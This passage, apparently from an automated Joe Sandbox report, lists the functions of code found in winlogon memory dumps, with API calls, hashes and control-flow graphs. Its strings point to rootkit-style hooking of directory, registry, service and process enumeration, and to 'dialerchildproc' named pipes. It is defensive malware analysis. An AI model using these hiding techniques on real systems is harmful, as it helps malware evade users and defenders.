                                                                          • Instruction Fuzzy Hash: 3261CC72B21690C7DA548F95D1207ADF3A2FF54BA5F588132DE5D07788DE38D852C700
                                                                          Function 000001E858981ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 000001E858981628: GetProcessHeap.KERNEL32 ref: 000001E858981633
                                                                            • Part of subcall function 000001E858981628: HeapAlloc.KERNEL32 ref: 000001E858981642
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816B2
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816DF
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589816F9
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981719
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981734
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981754
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898176F
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898178F
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817AA
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589817CA
                                                                          • Sleep.KERNEL32 ref: 000001E858981AD7
                                                                          • SleepEx.KERNELBASE ref: 000001E858981ADD
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817E5
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981805
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981820
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981840
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898185B
                                                                            • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898187B
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981896
                                                                            • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589818A0
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: 4bfe8da4bf64d09d75688e0bc86698689cfa1098149370d4ad6d534f2979ed62
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: D7317771231AC2D6EB50BB26DA513FDF3A9AF84BD0F0454339E0D87699FE24C8918A10
                                                                          Function 000001E8589B273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 350 1e8589b273c-1e8589b27a4 call 1e8589b29d4 * 4 359 1e8589b29b2 350->359 360 1e8589b27aa-1e8589b27ad 350->360 362 1e8589b29b4-1e8589b29d0 359->362 360->359 361 1e8589b27b3-1e8589b27b6 360->361 361->359 363 1e8589b27bc-1e8589b27bf 361->363 363->359 364 1e8589b27c5-1e8589b27e6 VirtualAlloc 363->364 364->359 365 1e8589b27ec-1e8589b280c 364->365 366 1e8589b2838-1e8589b283f 365->366 367 1e8589b280e-1e8589b2836 365->367 368 1e8589b2845-1e8589b2852 366->368 369 1e8589b28df-1e8589b28e6 366->369 367->366 367->367 368->369 372 1e8589b2858-1e8589b286a 368->372 370 1e8589b2992-1e8589b29b0 369->370 371 1e8589b28ec-1e8589b2901 369->371 370->362 371->370 373 1e8589b2907 371->373 379 1e8589b28ca-1e8589b28d2 372->379 380 1e8589b286c-1e8589b2878 372->380 375 1e8589b290d-1e8589b2921 373->375 377 1e8589b2923-1e8589b2934 375->377 378 1e8589b2982-1e8589b298c 375->378 383 1e8589b2936-1e8589b293d 377->383 384 1e8589b293f-1e8589b2943 377->384 378->370 378->375 379->372 381 1e8589b28d4-1e8589b28d9 379->381 385 1e8589b28c5-1e8589b28c8 380->385 381->369 387 1e8589b2970-1e8589b2980 383->387 388 1e8589b2945-1e8589b294b 384->388 389 1e8589b294d-1e8589b2951 384->389 385->379 386 1e8589b287a-1e8589b287d 385->386 390 1e8589b28a7-1e8589b28b7 386->390 391 1e8589b287f-1e8589b28a5 386->391 387->377 387->378 388->387 392 1e8589b2963-1e8589b2967 389->392 393 1e8589b2953-1e8589b2961 389->393 395 1e8589b28ba-1e8589b28c1 390->395 391->395 392->387 394 1e8589b2969-1e8589b296c 392->394 393->387 394->387 395->385
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: c921608bc3ed8dae174af04d789195309c5edfcc0c714fa749226a5546365456
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 7161DD32B29690CBEB548F95D1007ADF3A2FB54BA5F588136DE5D07788DE38D852C700

                                                                          Non-executed Functions

                                                                          Function 000001E858982B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: 04a661148b50104311287319c74e3cfe1c909468e327bc71e4abbcab7385a8c3
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: A6B15476220AD2C6EB699FA5D8407EDF3A5FB84B84F445027EE0D57B95EE35C880CB40
                                                                          Function 000001E858987D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: c25654e1fbf133ad71a07c6f0efe47fc9d8043adbf42997a59493c9db71f9faa
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 41313B76225BC1DAEB609F60E8807EDB365FB84744F44442ADA4E57B99EF38C648CB10
                                                                          Function 000001E85898D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 0fd8bee66b9aa75a719588d4164310d191915e835c40ed0449f42a8a8d7cafff
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: A5313D36224BC1D6EB60DB25E8403EEB3A4FB89754F500126EE9D53B59DF38C555CB00
                                                                          Function 000001E858987960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: 34985af1e6a69c2e887ac8394de09c6f631af6656f7e96728bd996360b5e390c
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 7D111C36720F91C9EB109B60E8553AD73A4FB19758F440E32DE6E467A4DF78D1988380
                                                                          Function 000001E85898DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                          • Instruction ID: 30bb9f7e9d87a9d9c65bc2380062ff3bad17e1f141d89e57fb0a08f8465aebfb
                                                                          • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                          • Instruction Fuzzy Hash: C551B5327246D1D9FB209B72E8407EEBBA5FB84794F144126EE9D67B95DE38C501CB00
                                                                          Function 000001E8589636F0 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                          • Instruction ID: 1e72e37fc9f235eb4f944ff72101e8db7dacc5524e3e801771df4715c73e88ad
                                                                          • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                          • Instruction Fuzzy Hash: 1BF0F4716356948EDB988F69E443759B7A1F748384FD0812ADA8EC3A14DB3C8455CF14
                                                                          Function 000001E8589812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: c2281e23739868d66036d4294d6c0683aafed4b8ecad6af3162b140505f798a1
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 4E512B36224BC5C6EB65DF62E54439EB7A2FB89BD9F044126DE4A07768EF38C0458B00
                                                                          Function 000001E858981D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: eae4a35ccf18d1ff6c879c1ad54c2bd4091f653bf096b8bfe55e41d2011e4d15
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 35316074130ACBE0EA45EBA9EDA16ECF322FF84344F8050339C1D12565AF788289CB50
                                                                          Function 000001E8589B6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 571 1e8589b6910-1e8589b6916 572 1e8589b6951-1e8589b695b 571->572 573 1e8589b6918-1e8589b691b 571->573 576 1e8589b6a78-1e8589b6a8d 572->576 574 1e8589b6945-1e8589b6984 call 1e8589b6fc0 573->574 575 1e8589b691d-1e8589b6920 573->575 594 1e8589b6a52 574->594 595 1e8589b698a-1e8589b699f call 1e8589b6e54 574->595 577 1e8589b6922-1e8589b6925 575->577 578 1e8589b6938 __scrt_dllmain_crt_thread_attach 575->578 579 1e8589b6a8f 576->579 580 1e8589b6a9c-1e8589b6ab6 call 1e8589b6e54 576->580 582 1e8589b6931-1e8589b6936 call 1e8589b6f04 577->582 583 1e8589b6927-1e8589b6930 577->583 586 1e8589b693d-1e8589b6944 578->586 584 1e8589b6a91-1e8589b6a9b 579->584 592 1e8589b6ab8-1e8589b6aed call 1e8589b6f7c call 1e8589b6e1c call 1e8589b7318 call 1e8589b7130 call 1e8589b7154 call 1e8589b6fac 580->592 593 1e8589b6aef-1e8589b6b20 call 1e8589b7190 580->593 582->586 592->584 605 1e8589b6b22-1e8589b6b28 593->605 606 1e8589b6b31-1e8589b6b37 593->606 599 1e8589b6a54-1e8589b6a69 594->599 603 1e8589b69a5-1e8589b69b6 call 1e8589b6ec4 595->603 604 1e8589b6a6a-1e8589b6a77 call 1e8589b7190 595->604 621 1e8589b6a07-1e8589b6a11 call 1e8589b7130 603->621 622 1e8589b69b8-1e8589b69dc call 1e8589b72dc call 1e8589b6e0c call 1e8589b6e38 call 1e8589bac0c 603->622 604->576 605->606 610 1e8589b6b2a-1e8589b6b2c 605->610 611 1e8589b6b39-1e8589b6b43 606->611 612 1e8589b6b7e-1e8589b6b94 call 1e8589b268c 606->612 617 1e8589b6c1f-1e8589b6c2c 610->617 618 1e8589b6b45-1e8589b6b4d 611->618 619 1e8589b6b4f-1e8589b6b5d call 1e8589c5780 611->619 632 1e8589b6b96-1e8589b6b98 612->632 633 1e8589b6bcc-1e8589b6bce 612->633 624 1e8589b6b63-1e8589b6b78 call 1e8589b6910 618->624 619->624 636 1e8589b6c15-1e8589b6c1d 619->636 621->594 644 1e8589b6a13-1e8589b6a1f call 1e8589b7180 621->644 622->621 674 1e8589b69de-1e8589b69e5 __scrt_dllmain_after_initialize_c 622->674 624->612 624->636 632->633 641 1e8589b6b9a-1e8589b6bbc call 1e8589b268c call 1e8589b6a78 632->641 634 1e8589b6bd0-1e8589b6bd3 633->634 635 1e8589b6bd5-1e8589b6bea call 1e8589b6910 633->635 634->635 634->636 635->636 653 1e8589b6bec-1e8589b6bf6 635->653 636->617 641->633 668 1e8589b6bbe-1e8589b6bc6 call 1e8589c5780 641->668 661 1e8589b6a21-1e8589b6a2b call 1e8589b7098 644->661 662 1e8589b6a45-1e8589b6a50 644->662 658 1e8589b6c01-1e8589b6c11 call 1e8589c5780 653->658 659 1e8589b6bf8-1e8589b6bff 653->659 658->636 659->636 661->662 673 1e8589b6a2d-1e8589b6a3b 661->673 662->599 668->633 673->662 674->621 675 1e8589b69e7-1e8589b6a04 call 1e8589babc8 674->675 675->621
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 5a678c2123d8270ec6fb616ddb0a075a8484000318cf7b7c2c8d3db3c22f7b07
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 2E818B316282C1CEFB92AB65D8413DDF6A0EF85B82F5481379E8D87796DF39E8458700
                                                                          Function 000001E858956910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 464 1e858956910-1e858956916 465 1e858956918-1e85895691b 464->465 466 1e858956951-1e85895695b 464->466 468 1e85895691d-1e858956920 465->468 469 1e858956945-1e858956984 call 1e858956fc0 465->469 467 1e858956a78-1e858956a8d 466->467 470 1e858956a9c-1e858956ab6 call 1e858956e54 467->470 471 1e858956a8f 467->471 473 1e858956938 __scrt_dllmain_crt_thread_attach 468->473 474 1e858956922-1e858956925 468->474 487 1e85895698a-1e85895699f call 1e858956e54 469->487 488 1e858956a52 469->488 485 1e858956aef-1e858956b20 call 1e858957190 470->485 486 1e858956ab8-1e858956aed call 1e858956f7c call 1e858956e1c call 1e858957318 call 1e858957130 call 1e858957154 call 1e858956fac 470->486 477 1e858956a91-1e858956a9b 471->477 479 1e85895693d-1e858956944 473->479 475 1e858956927-1e858956930 474->475 476 1e858956931-1e858956936 call 1e858956f04 474->476 476->479 496 1e858956b31-1e858956b37 485->496 497 1e858956b22-1e858956b28 485->497 486->477 499 1e858956a6a-1e858956a77 call 1e858957190 487->499 500 1e8589569a5-1e8589569b6 call 1e858956ec4 487->500 491 1e858956a54-1e858956a69 488->491 502 1e858956b7e-1e858956b94 call 1e85895268c 496->502 503 1e858956b39-1e858956b43 496->503 497->496 501 1e858956b2a-1e858956b2c 497->501 499->467 514 1e8589569b8-1e8589569dc call 1e8589572dc call 1e858956e0c call 1e858956e38 call 1e85895ac0c 500->514 515 1e858956a07-1e858956a11 call 1e858957130 500->515 509 1e858956c1f-1e858956c2c 501->509 521 1e858956bcc-1e858956bce 502->521 522 1e858956b96-1e858956b98 502->522 510 1e858956b4f-1e858956b5d call 1e858965780 503->510 511 1e858956b45-1e858956b4d 503->511 517 1e858956b63-1e858956b78 call 1e858956910 510->517 532 1e858956c15-1e858956c1d 510->532 511->517 514->515 567 1e8589569de-1e8589569e5 __scrt_dllmain_after_initialize_c 514->567 515->488 535 1e858956a13-1e858956a1f call 1e858957180 515->535 517->502 517->532 530 1e858956bd5-1e858956bea call 1e858956910 521->530 531 1e858956bd0-1e858956bd3 521->531 522->521 529 1e858956b9a-1e858956bbc call 1e85895268c call 1e858956a78 522->529 529->521 561 1e858956bbe-1e858956bc6 call 1e858965780 529->561 530->532 546 1e858956bec-1e858956bf6 530->546 531->530 531->532 532->509 554 1e858956a45-1e858956a50 535->554 555 1e858956a21-1e858956a2b call 1e858957098 535->555 551 1e858956bf8-1e858956bff 546->551 552 1e858956c01-1e858956c11 call 1e858965780 546->552 551->532 552->532 554->491 555->554 566 1e858956a2d-1e858956a3b 555->566 561->521 566->554 567->515 568 1e8589569e7-1e858956a04 call 1e85895abc8 567->568 568->515
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: dbfcc5e9c0d96a37b9fd7991c7f30359c355952af576fe6994b0ae7cc5e7709f
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: CB817B317352C1CAFA96AB66D8513DDF3A0AF85782F548037AE4D87796DF38C94A8700
                                                                          Function 000001E85898CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001E85898CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001E85898CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001E85898ECCC,?,?,?,?,000001E85898BF9F,?,?,?,?,?,000001E858987AB0), ref: 000001E85898CF2C
                                                                            • Part of subcall function 000001E85898D6CC: HeapAlloc.KERNEL32 ref: 000001E85898D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF54
                                                                            • Part of subcall function 000001E85898D744: HeapFree.KERNEL32 ref: 000001E85898D75A
                                                                            • Part of subcall function 000001E85898D744: GetLastError.KERNEL32 ref: 000001E85898D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF76
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: f86b91cb66a3c6f8454f4038e5b621bb7ea2211ae881aec1b10a116c1fa3f1b4
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 96416E302312CAC6FAA8A735D5553FDF2425F847B8F541736AD3F476E7DE2888018A40
                                                                          Function 000001E858982244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: 51a05a011626c34f84d443abd0de517d886d5e25bc20737c8bb9c705d9869c07
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: A5211D36624781C2EB109B25F5543ADB7A1FB89BE5F504226EE5E02AA8DF7CC149CF00
                                                                          Function 000001E8589B9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: ea488144e67ee9814cb3c00e2a8ac0c782a2014a7bbb5d57e2db9a248e5ddb93
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: F4E18D72628BC1CAEB609F65D4813DDB7A4FB89B99F100126EE8D57B9ADF34C491C700
                                                                          Function 000001E85898A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
